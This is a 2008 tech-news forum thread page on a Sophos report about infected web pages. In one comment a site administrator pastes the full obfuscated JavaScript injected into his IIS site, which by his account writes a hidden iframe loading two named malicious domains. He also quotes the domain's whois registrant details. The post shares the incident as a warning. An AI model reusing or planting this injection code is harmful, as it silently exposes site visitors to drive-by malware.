Sophos: One Web page infected every five seconds

TalkBack 28 of 30:: Next »; « Previous

Thread View
Flat View

Here you have it: One month ago, one of the sites I manage (IIS, alas...) got hacked with a crypted code : ---------------------
%64d%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;st%3d%22%2573t%253d%2522$%253d%2573t%253bd%2563s%2528d%2561+%2564%2562+%2564c%252b%2564%2564%252bd%2565,%25310%2529%253b%2564%2577%2528%2573%2574)%253b%2573%2574%253d$;%2522%253b%22;ce%3d%22tm%2570.ch%2561rCo%2564eA%2574(0%2529%255e(%25270x%25300%2527+es))%2529;%257d}%22;cd%3d%22%252b1);%2573t%253dst%252b%2553tri%256e%2567.%2566%2572%256fm%2543har%2543ode%2528(%22;cb%3d%22%2563ape%2528d%2573);%2573t%253dtmp%253d%2527%2527;for(%2569%253d%2530;i%253c%2564s%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;dz%3d%22%2566u%256ec%2574%2569o%256e d%2577(%2574){c%2561%253d%2527%252564o%2563u%25256de%256e%2574%25252ewr%2525%25369%2574e%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253cs%252563r%252569%252570t %25256%2563%252561n%252567%2575%2525%25361%25256%2537%252565%25253d%25255c%252522j%2561vas%25256%2533r%252569%2570t%25255c%252522%25253%2565%2527%253b%2563c%253d%2527%25253c%25255c%25252f%2573cr%2569%252570t%25253e%2527;%2565v%2561%256c(%2575n%2565s%2563a%2570e(t%2529%2529%257d;%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfs;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;op%3d%22%2524%253d%2522dw(%2564cs(%2563%2575%252c14)%2529;%2522%253b%22;cz%3d%22%2566u%256ecti%256fn%2520c%257a(cz%2529{%2572e%2574urn%2520ca%252bcb+%2563c%252bcd%252bce%252b%2563z;%257d%253b%22;ca%3d%22%2566un%2563t%2569%256f%256e dc%2573(d%2573%252c%2565%2573%2529%257bd%2573%253dun%2565s%22;cc%3d%22.%256c%2565ng%2574%2568%253bi+%252b)%257bt%256dp%253dd%2573%252e%2573lic%2565(i%252ci%22;%69f (%64ocu%6dent%2ec%6f%6fk%69e%2ei%6ede%78Of%28%27vbul%6c%65%74%69%6e_m%75l%74iqu%6fte%3d%27)%3d%3d-%31){s%63(%27vb%75lle%74%69n_m%75lt%69q%75ote%3d%27,2,7);%65v%61%6c%28%75nes%63ape%28dz%2bcz+%6fp%2bs%74)%2b%27dw(dz+%63z($%2bs%74%29);%27%29}e%6c%73e{$%3d%27%27};fun%63ti%6f%6e sc%28c%6e%6d%2cv%2ce%64){v%61%72 %65x%64%3dn%65w %44a%74e%28);e%78d.s%65%74Da%74e%28ex%64.%67et%44at%65(%29%2bed%29%3bd%6f%63um%65nt%2eco%6f%6bie%3dcnm%2b%20%27%3d%27 +es%63%61p%65(v%29+%27;exp%69%72%65s%3d%27+exd.%74oG%4dTSt%72%69%6eg()%3b}%3b
--------------------------------
After I decoded this I got html for a hidden layer containing an iframe calling this web page (don't click now!): -http://hnoafir.com/ld/grg/-or sometimes : - http://ful1thr.com/ld/grg-

I did a whois on ful1thr.com and I got this:
Registrant:
Leintow Maximo lastochka@zmail.ru +9.72541682457
N/A
Suite 5, Garden City Plaza
City of Belmopan,Mountainview Boulevard,BR 3472822181
----------
So it seems the attack comes from Russia...
The attack missed because the layer was visible on the page because of (I suppose) a CSS and some ASP init codes.
To fix that mess I re uploaded the good backup page and changed all the passwords for the site. How they hacked the page I still don't know.
Anyway, I thought this could be intersting to post here.; Posted by: tekWatcher Posted on: 04/28/08 You are currently: a Guest | Members login | Terms of Use

Reply to Story Reply to Message

Alert moderator to an offensive message

Subscribe to this discussion via Email or RSS

But, the web runs on *nix No_Ax_to_Grind | 04/23/08

So... zkiwi | 04/28/08

Windows is just restin'. happy

[nt] olePigeon | 04/28/08

Probably pining for the fjords [nt] wink

GTWilson | 05/08/08

Re: But, the web runs on *nix 5iN | 04/29/08

Web apps and poor coding mystic100 | 04/29/08

RE: Sophos: One Web page infected every five seconds pixolut | 04/23/08

Practical steps? zbeauvais | 04/24/08

Practical steps to protecting your web server Carole Theriault | 04/29/08

RE: Sophos: One Web page infected every five seconds ThePCmann | 04/24/08

I agree with email charges, but... KaplanMike | 04/28/08

Moreover, what about LEGIT mass mailers - like Liberal Causes? drprod@... | 04/28/08

Politics jmadlena@... | 04/28/08

It seems like a good time to re consider charging something like a tenth... PCSense | 04/28/08

RE: Sophos: One Web page infected every five seconds shoktai@... | 04/24/08

RE: Sophos: One Web page infected every five seconds thebithead | 04/28/08

RE: Sophos: One Web page infected every five seconds schmandel@... | 04/28/08

Sophos Report terimac | 04/28/08

I read the "original report" vilppuu@... | 04/28/08

RE: Sophos: One Web page infected every five seconds terimac | 04/28/08

I really like Sophos Anti-Virus... olePigeon | 04/28/08

AMEN! NGENeer | 04/28/08

RE: Sophos: One Web page infected every five seconds dbucyk@... | 04/28/08

RE: Sophos: One Web page infected every five seconds paulpetrucci@... | 04/28/08

Re Spybot S&D Alzie | 04/29/08

RE: Sophos: One Web page infected every five seconds rfrith | 04/28/08

RE: Sophos: One Web page infected every five seconds kaozdnet | 04/28/08

Here you have it tekWatcher | 04/28/08

There is no information on their methodology tracy anne | 04/29/08

RE: Sophos: One Web page infected every five seconds dariced@... | 06/12/08

What do you think?

SponsoredWhite Papers, Webcasts, and Downloads

Five Steps to Determine When to Virtualize YourServers VMware Server virtualization isn't just for big companies. Entry-level ... Download Now
Virtualization: Architectural Considerations And Other Evaluation Criteria VMware Of the many approaches to x86 systems virtualization available in the ... Download Now
Why Isn't Server Virtualization Saving Us More? A Few Small Changes May Dramatically Increase Your Efficiency VMware Companies have rapidly adopted server virtualization over the past few ... Download Now

Premier Vendor Content Whitepapers, webcasts & resources from our Power Center Sponsors

SmartPlanet

Thought-provoking progressive ideas on diverse topics that intersect with technology, business, and life, and matter to the world at large. Visit SmartPlanet
More from IBM
Innovate your business' process model, play against the market, compete against others on our scoreboards and WIN! Try INNOV8 2.0: A BPM Simulator
Enabling Real-World Business Transformation through IBM Service Management Read the EMA Analyst Report

Read the original story

Sophos: One Web page infected every five seconds

What do you think?

SponsoredWhite Papers, Webcasts, and Downloads

Premier Vendor Content Whitepapers, webcasts & resources from our Power Center Sponsors

SmartPlanet

Blogs

Product Reviews

Videos

White Papers and Webcasts

Downloads

More

ZDNet News & Blogs

Product Reviews

Product Blogs

White Papers & Webcasts

Downloads